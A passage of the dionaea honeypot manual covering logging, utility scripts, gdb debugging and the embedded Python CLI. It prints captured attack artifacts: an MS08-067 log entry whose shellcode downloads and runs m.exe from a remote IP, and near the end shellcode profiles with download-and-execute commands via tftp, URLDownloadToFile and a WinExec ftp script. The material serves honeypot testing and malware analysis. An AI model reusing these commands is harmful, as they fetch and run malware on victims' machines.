2407 logsql requires the directory where the logsql.sqlite file resides to
2409 be writeable by the user, as well as the logsql.sqlite file itself.
2410 So, if you drop user privs, make sure the user you drop to is allowed
2411 to read/write the file and the directory.
2412 chown MYUSER:MYGROUP /var/lib/dionaea -R
2414 To query the logsql database, I recommend looking at the readlogsql‐
2416 tree.py <#readlogsqltree> script, for visualisation the gnuplotsql
2417 <#gnuplotsql> script.
2418 The blog on logsql:
2420 • 2009-11-06 dionaea sql logging
2422 • 2009-12-08 post it yourself
2424 • 2009-12-12 sqlite performance
2426 • 2009-12-14 virustotal fun
2428 • 2009-12-15 paris mission pack avs
2430 • 2010-06-06 data visualisation
2432 logxmpp
2434 This section controls the logging to xmpp services. If you want to use
2435 logxmpp, make sure to enable logxmpp in the ihandler section. Using
2436 logxmpp allows you to share your new collected files with other sensors
2437 anonymously.
2438 The blog on logxmpp:
2440 • 2010-02-10 xmpp backend
2442 • 2010-05-12 xmpp take #2
2444 • 2010-05-15 xmpp take #3
2446 pg_backend <#pg_backend> can be used as a backend for xmpp logging sen‐
2448 sors.
2449 p0f
2451 Not enabled by default, but recommend: the p0f service, enable by un‐
2452 commenting p0f in the ihandlers section of the python modules section,
2453 and start p0f as suggested in the config. It costs nothing, and gives
2454 some pretty cool, even if outdated, informations about the attackers
2455 operating system, and you can look them up from the sqlite database,
2456 even the rejected connections. If you face problems, here are some
2457 hints.
2458 ihandlers
2460 ihandlers section is used to specify which ihandlers get started by
2461 ihandlers.py . You do not want to miss p0f and logsql.
2462 services
2464 services controls which services will get started by services.py
2465
2467 Dionaea ships with some utils, as these utils are written in python and
2468 rely on the python3 interpreter dionaea requires to operate, this soft‐
2469 ware can be found in modules/python/utils:
2470 readlogsqltree <#readlogsqltree> -
2472 modules/python/readlogsqltree.py
2473 readlogsqltree is a python3 script which queries the logsql sqlite
2475 database for attacks, and prints out all related information for every
2476 attack. This is an example for an attack, you get the vulnerability
2477 exploited, the time, the attacker, information about the shellcode, the
2478 file offered for download, and even the virustotal report for the file:
2479 2010-10-07 20:37:27
2481 connection 483256 smbd tcp accept 10.0.1.11:445 <- 93.177.176.190:47650 (483256 None)
2482 dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2483 dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2484 dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2485 dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2486 dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2487 dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2488 dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2489 dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2490 dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2491 dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2492 dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2493 dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2494 profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.158/m.exe', '60.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['60.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
2495 offer: http://208.53.183.158/m.exe
2496 download: 3eab379ddac7d80d3e38399fd273ddd4 http://208.53.183.158/m.exe
2497 virustotal 2010-10-07 04:59:07 5/38 (13%) http://www.virustotal.com/file-scan/report.html?id=265e39edcba9d9004451601544e625f2d3d04f837d0aaf1f8464cb2c819c1939-1286420347
2498 names 'High Risk Fraudulent Security Program' 'Suspicious file' 'Trojan.DownLoader1.27100' 'Worm.Win32.Rimecud' 'Worm:Win32/Rimecud.B'
2499 To create such report for your own honeypots activities for the last 24
2501 hours run:
2502 ./readlogsqltree.py -t $(date '+%s')-24*3600 /var/lib/dionaea/logsql.sqlite
2504 gnuplotsql <#gnuplotsql> - modules/python/gnuplotsql.py
2507 gnuplotsql is a very slow python3 script which runs some queries on the
2509 logsql <#logsql> sqlite database and creates graphs with gnuplot of the
2510 data, stores them on disk and creates an index of the data. The images
2511 are per protocol and look like this: Overview for dionaea smbd. Here
2512 <gnuplotsql> is how the whole thing looks like. To create such images
2513 of your own data, run:
2514 ./gnuplotsql.py -d /var/lib/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd
2516 The blog got something on gnuplotsql as well:
2518 • 2010-12-05 sudden death
2520 • 2010-10-01 Infosanity’s Blog: gnuplotsql.py
2522 • 2010-09-19 gnuplotsql
2524 pg_backend <#pg_backend> - modules/python/xmpp/pg_backend.py
2526 pg_backend is the backend for logxmpp <#logxmpp>, currently it is a
2528 python2.x script which uses pyxmpp to access the xmpp service. It
2529 parses the messages received and can store the events in a postgres
2530 database and the received files on disk. pg_backend requires an xmpp
2531 account:
2532 /without db/
2534 ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -f /tmp/
2535 /with db/
2537 create database
2538 psql ...
2540 start backend
2542 ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/
2544
2546 In case you experience a segfault, you will see something like this:
2547 This is the end. This software just had a segmentation fault. The bug
2549 you encountered may even be exploitable. If you want to assist in fix‐
2550 ing the bug, please send the backtrace below to nepenthesdev@gmail.com.
2551 You can create better backtraces with gdb, for more information visit
2552 http://dionaea.carnivore.it/#segfault Once you read this message, your
2553 tty may be broken, simply type reset, so it will come to life again:
2554 /opt/dionaea/bin/dionaea(sigsegv_backtrace_cb+0x20)[0x805c11e]
2556 [0x70d420]
2557 /opt/dionaea/lib/libemu/libemu.so.2(emu_env_w32_eip_check+0x94)[0x186974]
2558 /opt/dionaea/lib/dionaea/emu.so(run+0x39)[0x89cced]
2559 /opt/dionaea/lib/dionaea/emu.so(profile+0xbb)[0x89db88]
2560 /opt/dionaea/lib/dionaea/emu.so(proc_emu_on_io_in+0x1e1)[0x89bfc5]
2561 /opt/dionaea/bin/dionaea(recurse_io_process+0x31)[0x805df4a]
2562 /opt/dionaea/bin/dionaea(processors_io_in_thread+0x85)[0x805e08d]
2563 /opt/dionaea/bin/dionaea(threadpool_wrapper+0x2e)[0x805c99a]
2564 /opt/dionaea/lib/libglib-2.0.so.0[0xaa9498]
2565 /opt/dionaea/lib/libglib-2.0.so.0[0xaa7a2f]
2566 /lib/libpthread.so.0[0xd8973b]
2567 /lib/libc.so.6(clone+0x5e)[0x2b3cfe]
2568 While the backtrace itself gives an idea what might be wrong, it does
2570 not fix the problem. To fix the problem, the logfiles usually help, as
2571 dionaea is very verbose by default. Below are some hints how to get
2572 started with debugging, click here <#support> for assistance.
2573 debugging
2575
2577 Valgrind does a great job, here is how I use it:
2578 valgrind -v --leak-check=full --leak-resolution=high --show-reachable=yes \
2580 --log-file=dionaea-debug.log /opt/dionaea/bin/dionaea --my-dionaea-options
2581 gdb
2584 logfile assisted
2587 For the above example, I was able to scrape the shellcode from the log‐
2589 file, and run it in libemu, without involving dionaea at all, reducing
2590 the problem:
2591 gdb /opt/dionaea/bin/sctest
2593 (gdb) run -S -s 10000000 -g < sc.bin
2594 Starting program: /media/sda4/opt64/dionaea/bin/sctest -S -s 10000000 -g < sc.bin
2595 Once it crashed, I retrieved a full backtrace:
2597 Program received signal SIGSEGV, Segmentation fault.
2599 env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2600 545 struct emu_env_hook *hook = (struct emu_env_hook *)ehi->value;
2601 (gdb) bt full
2603 #0 env_w32_hook_GetProcAddress (env=0x629a30, hook=<value optimized out>) at environment/win32/env_w32_dll_export_kernel32_hooks.c:545
2604 dll = 0x6366f0
2605 ehi = <value optimized out>
2606 hook = <value optimized out>
2607 c = 0x611180
2608 mem = <value optimized out>
2609 eip_save = <value optimized out>
2610 module = 2088763392
2611 p_procname = 4289925
2612 procname = <value optimized out>
2613 #1 0x00007ffff7b884fb in emu_env_w32_eip_check (env=0x629a30) at environment/win32/emu_env_w32.c:306
2614 dll = <value optimized out>
2615 ehi = <value optimized out>
2616 hook = 0x64c5b0
2617 eip = <value optimized out>
2618 #2 0x0000000000403995 in test (e=0x60f0e0) at sctestmain.c:277
2619 hook = 0xe2
2620 ev = 0x0
2621 iv = <value optimized out>
2622 cpu = 0x611180
2623 mem = <value optimized out>
2624 env = 0x629a30
2625 na = <value optimized out>
2626 j = 7169
2627 last_vertex = 0x0
2628 graph = 0x0
2629 eh = 0x0
2630 ehi = 0x0
2631 ret = <value optimized out>
2632 eipsave = 2088807840
2633 #3 0x00000000004044e4 in main (argc=5, argv=0x7fffffffe388) at sctestmain.c:971
2634 e = <value optimized out>
2635 In this case, the problem was a bug in libemu.
2637 gdb dump memory
2638 Once again, it broke, and we got a backtrace:
2640 #0 0xb70b0b57 in emu_queue_enqueue (eq=0xb3da0918, data=0x4724ab) at emu_queue.c:63
2642 eqi = (struct emu_queue_item *) 0x0
2643 #1 0xb70b15d1 in emu_shellcode_run_and_track (e=0xb4109cd0, data=0xb411c698 "", datasize=<value optimized out>, eipoffset=<value optimized out>,
2644 steps=256, etas=0xb410cd60, known_positions=0xb3d7a810, stats_tested_positions_list=0xb3da3bf0, brute_force=true) at emu_shellcode.c:408
2645 current_pos_ti_diff = (struct emu_tracking_info *) 0x88c3c88
2646 current_pos_ht = <value optimized out>
2647 current_pos_v = <value optimized out>
2648 current_pos_satii = (struct emu_source_and_track_instr_info *) 0xb407e7f8
2649 bfs_queue = (struct emu_queue *) 0xb3e17668
2650 ret = 4662443
2651 eipsave = <value optimized out>
2652 hook = <value optimized out>
2653 j = 4
2654 es = <value optimized out>
2655 eli = (struct emu_list_item *) 0xb3e17658
2656 cpu = (struct emu_cpu *) 0xb4109ab0
2657 mem = (struct emu_memory *) 0xb410c3a0
2658 eq = (struct emu_queue *) 0xb3da0918
2659 env = (struct emu_env *) 0xb3e10208
2660 eli = (struct emu_list_item *) 0x4724ab
2661 #2 0xb70b1a2a in emu_shellcode_test (e=0xb4109cd0, data=0xb411c698 "", size=<value optimized out>) at emu_shellcode.c:546
2662 es = (struct emu_stats *) 0xb3d92b28
2663 new_results = (struct emu_list_root *) 0xb3da3bf0
2664 offset = <value optimized out>
2665 el = (struct emu_list_root *) 0xb4100510
2666 etas = (struct emu_track_and_source *) 0xb410cd60
2667 eh = (struct emu_hashtable *) 0xb3d7a810
2668 eli = (struct emu_list_item *) 0xb3d92b40
2669 results = (struct emu_list_root *) 0xb3d82850
2670 es = <value optimized out>
2671 __PRETTY_FUNCTION__ = "emu_shellcode_test"
2672 #3 0xb712140c in proc_emu_on_io_in (con=0x8864b58, pd=0x87dc388) at detect.c:145
2673 e = (struct emu *) 0xb4109cd0
2674 ctx = (struct emu_ctx *) 0x87a2400
2675 offset = 14356
2676 streamdata = (void *) 0xb411c698
2677 size = 8196
2678 ret = 0
2679 __PRETTY_FUNCTION__ = "proc_emu_on_io_in"
2680 #4 0x0805e8be in recurse_io_process (pd=0x87dc388, con=0x8864b58, dir=bistream_in) at processor.c:167
2681 No locals.
2682 #5 0x0805ea01 in processors_io_in_thread (data=0x8864b58, userdata=0x87dc388) at processor.c:197
2683 con = (struct connection *) 0x8864b58
2684 pd = (struct processor_data *) 0x87dc388
2685 __PRETTY_FUNCTION__ = "processors_io_in_thread"
2686 #6 0x0805d2da in threadpool_wrapper (data=0x87d7bd0, user_data=0x0) at threads.c:49
2687 t = (struct thread *) 0x87d7bd0
2688 timer = (GTimer *) 0xb4108540
2689 #7 0xb77441f6 in g_thread_pool_thread_proxy (data=0x83db460) at gthreadpool.c:265
2690 task = (gpointer) 0x87d7bd0
2691 pool = (GRealThreadPool *) 0x83db460
2692 #8 0xb7742b8f in g_thread_create_proxy (data=0x83dc7d0) at gthread.c:635
2693 __PRETTY_FUNCTION__ = "g_thread_create_proxy"
2694 #9 0xb76744c0 in start_thread () from /lib/i686/cmov/libpthread.so.0
2695 No symbol table info available.
2696 #10 0xb75f36de in clone () from /lib/i686/cmov/libc.so.6
2697 No symbol table info available.
2698 Again, it was a bug in libemu, an unbreakable loop consuming all mem‐
2700 ory. To reproduce, we have to dump the tested buffer, therefore we
2701 need the buffers address and size. Luckily the size is noted in frame
2702 #2 as 8196 and and the data address is a parameter which got not opti‐
2703 mized out for frame #2:
2704 dump binary memory /tmp/sc.bin 0xb411c698 0xb411e89c
2706 Afterwards, debugging libemu by feeding the data into sctest is easy.
2708 I’ve had fun with objgraph and gdb debugging reference count leaks in
2710 python too, here <http://carnivore.it/2009/12/23/arcane_bugs> is the
2711 writeup:
2712 gdb python3 embedded
2714 Sometimes, there is something wrong with the python scripts, but gdb
2716 does not provide any useful output:
2717 bt full
2719 #12 0xb765f12d in PyEval_EvalFrameEx (f=0x825998c, throwflag=0) at Python/ceval.c:2267
2720 stack_pointer = (PyObject **) 0x8259af0
2721 next_instr = (unsigned char *) 0x812fabf "m'"
2722 opcode = 100
2723 oparg = <value optimized out>
2724 why = 3071731824
2725 err = 1
2726 x = (PyObject *) 0xb7244aac
2727 v = <value optimized out>
2728 w = (PyObject *) 0xadb5e4dc
2729 u = (PyObject *) 0xb775ccb0
2730 freevars = (PyObject **) 0x8259af0
2731 retval = (PyObject *) 0x0
2732 tstate = (PyThreadState *) 0x809aab0
2733 co = (PyCodeObject *) 0xb717b800
2734 instr_ub = -1
2735 instr_lb = 0
2736 instr_prev = -1
2737 first_instr = (unsigned char *) 0x812f918 "t"
2738 names = (PyObject *) 0xb723f50c
2739 consts = (PyObject *) 0xb71c9f7c
2740 opcode_targets = {0xb765d202, 0xb765f60a, 0xb766133a, 0xb76612db, 0xb7661285, 0xb7661222, 0xb765d202, 0xb765d202, 0xb765d202, 0xb76611dd,
2741 0xb766114b, 0xb76610b9, 0xb766100f, 0xb765d202, 0xb765d202, 0xb7660f7d, 0xb765d202, 0xb765d202, 0xb765d202, 0xb7660eb7, 0xb7660dfb, 0xb765d202,
2742 0xb7660d30, 0xb7660c65, 0xb7660ba9, 0xb7660aed, 0xb7660a31, 0xb7660975, 0xb76608b9, 0xb76607fd, 0xb765d202 <repeats 24 times>, 0xb7660736, 0xb766066b,
2743 0xb76605af, 0xb76604f3, 0xb765d202, 0xb7660437, 0xb766035d, 0xb76602ad, 0xb7661aba, 0xb76619fe, 0xb7661942, 0xb7661886, 0xb7661b76, 0xb76614a8,
2744 0xb7661413, 0xb766138e, 0xb766171f, 0xb76616e6, 0xb765d202, 0xb765d202, 0xb765d202, 0xb766162a, 0xb766156e, 0xb76601f1, 0xb7660135, 0xb76617ca,
2745 0xb7660120, 0xb765fff7, 0xb765d202, 0xb765fd72, 0xb765fc6e, 0xb765d202, 0xb765fc1d, 0xb765fe17, 0xb765fd90, 0xb765fec0, 0xb765fb41, 0xb765fadc,
2746 0xb765f9ed, 0xb765f94d, 0xb765f8be, 0xb765f7e3, 0xb765f779, 0xb765f6bd, 0xb765f66c, 0xb765ef1d, 0xb765eea2, 0xb765ede1, 0xb765ed1a, 0xb765ec35,
2747 0xb765ebc3, 0xb765eb30, 0xb765ea69, 0xb765f1c7, 0xb765f027, 0xb765f560, 0xb765efc1, 0xb76630e3, 0xb766310c, 0xb765e64c, 0xb765e592, 0xb765f49a,
2748 0xb765f3de, 0xb765d202, 0xb765d202, 0xb765f39e, 0xb7663135, 0xb766315f, 0xb765e9cb, 0xb765d202, 0xb765e948, 0xb765e8bb, 0xb765e817, 0xb765d202,
2749 0xb765d202, 0xb765d202, 0xb765d2ae, 0xb765e3e0, 0xb7663275, 0xb765e1a2, 0xb766324e, 0xb765e0ba, 0xb765e01e, 0xb765df74, 0xb765d202, 0xb765d202,
2750 0xb7663189, 0xb76631d3, 0xb7663220, 0xb765e149, 0xb765d202, 0xb765de09, 0xb765dec0, 0xb765f2c0, 0xb765d202 <repeats 108 times>}
2751 #13 0xb7664ac0 in PyEval_EvalCodeEx (co=0xb717b800, globals=0xb7160b54, locals=0x0, args=0x84babb8, argcount=9, kws=0x0, kwcount=0, defs=0xb719e978,
2752 defcount=1, kwdefs=0x0, closure=0x0) at Python/ceval.c:3198
2753 f = (PyFrameObject *) 0x825998c
2754 retval = <value optimized out>
2755 freevars = (PyObject **) 0x8259af0
2756 tstate = (PyThreadState *) 0x809aab0
2757 x = <value optimized out>
2758 u = <value optimized out>
2759 Luckily python3 ships with some gdb macros, which assist in dealing
2761 with this mess. You can grab them over here <‐
2762 http://svn.python.org/view/python/tags/r311/Misc/gdbinit?view=markup>,
2763 place them to ~/.gdbinit, where ~ is the homedirectory of the user
2764 dionaea runs as. If you get /warning: not using untrusted file
2765 “/home/user/.gdbinit”/ you are running gdb via sudo, and the file
2766 /home/user/.gdbinit has to be owned by root. If you are running as
2767 root, and you get /Program received signal SIGTTOU, Stopped (tty out‐
2768 put)./, run stty -nostop before running gdb, reattach the process with
2769 fg, close gdb properly, and start over.
2770 Once you got the macros loaded properly at gdb startup, set a break‐
2772 point on PyEval_EvalFrameEx after dionaea loaded everything:
2773 break PyEval_EvalFrameEx
2775 Then we have some useful macros for gdb:
2777 up
2779 pyframev
2780 pyframev combines the output of pyframe and pylocals.
2782 Be aware you can segfault dionaea now from within gdb, going up, out of
2784 the python call stack and calling some of the macros can and in most
2785 cases will segfault dionaea, therefore use backtrace to make sure you
2786 are still within valid frames. We can’t use pystack or pystackv as
2787 they rely on Py_Main, which is an invalid assumption for embedded
2788 python.
2789
2791 dionaea embedds a python interpreter, and can offer a python cli there‐
2792 fore too. The python cli is blocking, if you start entering a command,
2793 the whole process will wait for you to finish it, and not accept any
2794 new connections. You can use the python cli to interact with dionaea,
2795 which is very useful for development and debugging.
2796 Configuration
2798 You can access the dionaea.conf via python (readonly):
2799 from dionaea import g_dionaea
2801 g_dionaea.config()
2802 Completition and History on the CLI
2804 If you use the cli often, you can make it behave like a real shell, in‐
2805 cluding history and completition.:
2806 import rlcompleter, readline
2808 readline.parse_and_bind('tab: complete')
2809 Triggering Downloads
2811 Sometimes it helps to trigger a download, without waiting for an at‐
2812 tack. Very useful if you want to verify permissions are correct when
2813 switching the user, or making sure a submission to a 3rd party works
2814 correctly. You can trigger downloads for all major protocols.
2815 ftp
2817 from dionaea.ftp import ftp
2818 f = ftp()
2819 f.download(None, 'anonymous','guest','ftp.kernel.org',21, 'welcome.msg', 'binary','ftp://ftp.kernel.org/welcome.msg')
2820 tftp
2822 from dionaea.tftp import TftpClient
2823 t = TftpClient()
2824 t.download(None, 'tftp.example.com', 69, 'filename')
2825 http
2827 As the http download is not done in python, we do not use the download
2828 facility directly, but create an incident, which will trigger the down‐
2829 load:
2830 from dionaea.core import incident
2832 i = incident("dionaea.download.offer")
2833 i.set("url", "http://www.honeynet.org")
2834 i.report()
2835 incidents
2837 incidents are the ipc used in dionaea.
2838 dumping
2840 from dionaea.core import ihandler
2841 class idumper(ihandler):
2842 def __init__(self, pattern):
2843 ihandler.__init__(self, pattern)
2844 def handle(self, icd):
2845 icd.dump()
2846 a = idumper('*')
2848 emu profile
2850 Small collection of various shellcode profiles gatherd from dionaea.
2851 CreateProcess Commands
2853 This profile will trigger a download via tftp.
2854 p='[{"call": "CreateProcess", "args": ["", "tftp.exe -i 92.17.46.208 get ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "CreateProcess", "args": ["", "ssms.exe", "", "", "1", "40", "", "", {"dwXCountChars": "0", "dwFillAttribute": "0", "hStdInput": "0", "dwYCountChars": "0", "cbReserved2": "0", "cb": "0", "dwX": "0", "dwY": "0", "dwXSize": "0", "lpDesktop": "0", "hStdError": "68", "dwFlags": "0", "lpReserved": "0", "lpReserved2": "0", "hStdOutput": "0", "lpTitle": "0", "dwYSize": "0", "wShowWindow": "0"}, {"dwProcessId": "4712", "hProcess": "4711", "dwThreadId": "4714", "hThread": "4712"}], "return": "-1"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2856 from dionaea.core import incident
2857 i = incident("dionaea.module.emu.profile")
2858 i.set("profile", str(p))
2859 i.report()
2860 URLDownloadToFile
2862 This profile will trigger a download.
2863 p='[{"call": "LoadLibraryA", "args": ["urlmon"], "return": "0x7df20000"}, {"call": "URLDownloadToFile", "args": ["", "http://82.165.32.34/compiled.exe", "47.scr", "0", "0"], "return": "0"}, {"call": "WinExec", "args": ["47.scr", "895"], "return": "32"}]'
2865 from dionaea.core import incident
2866 i = incident("dionaea.module.emu.profile")
2867 i.set("profile", str(p))
2868 i.report()
2869 WinExec Commands
2871 This profile uses WinExec to create a command file for windows ftp
2872 client, downloads a file, and executes the file.:
2873 p='[{"call": "WinExec", "args": ["cmd /c echo open welovewarez.com 21 > i&echo user wat l0l1 >> i &echo get SCUM.EXE >> i &echo quit >> i &ftp -n -s:i &SCUM.EXE\\r\\n", "0"], "return": "32"}, {"call": "ExitThread", "args": ["0"], "return": "0"}]'
2875 from dionaea.core import incident
2876 i = incident("dionaea.module.emu.profile")
2877 i.set("profile", str(p))
2878 i.report()
2879 • genindex
2881 • modindex
2883 • search
2885
2887 dionaea
2888
2890 2021, dionaea
28910.7.0 Jan 26, 2021 DIONAEA(1)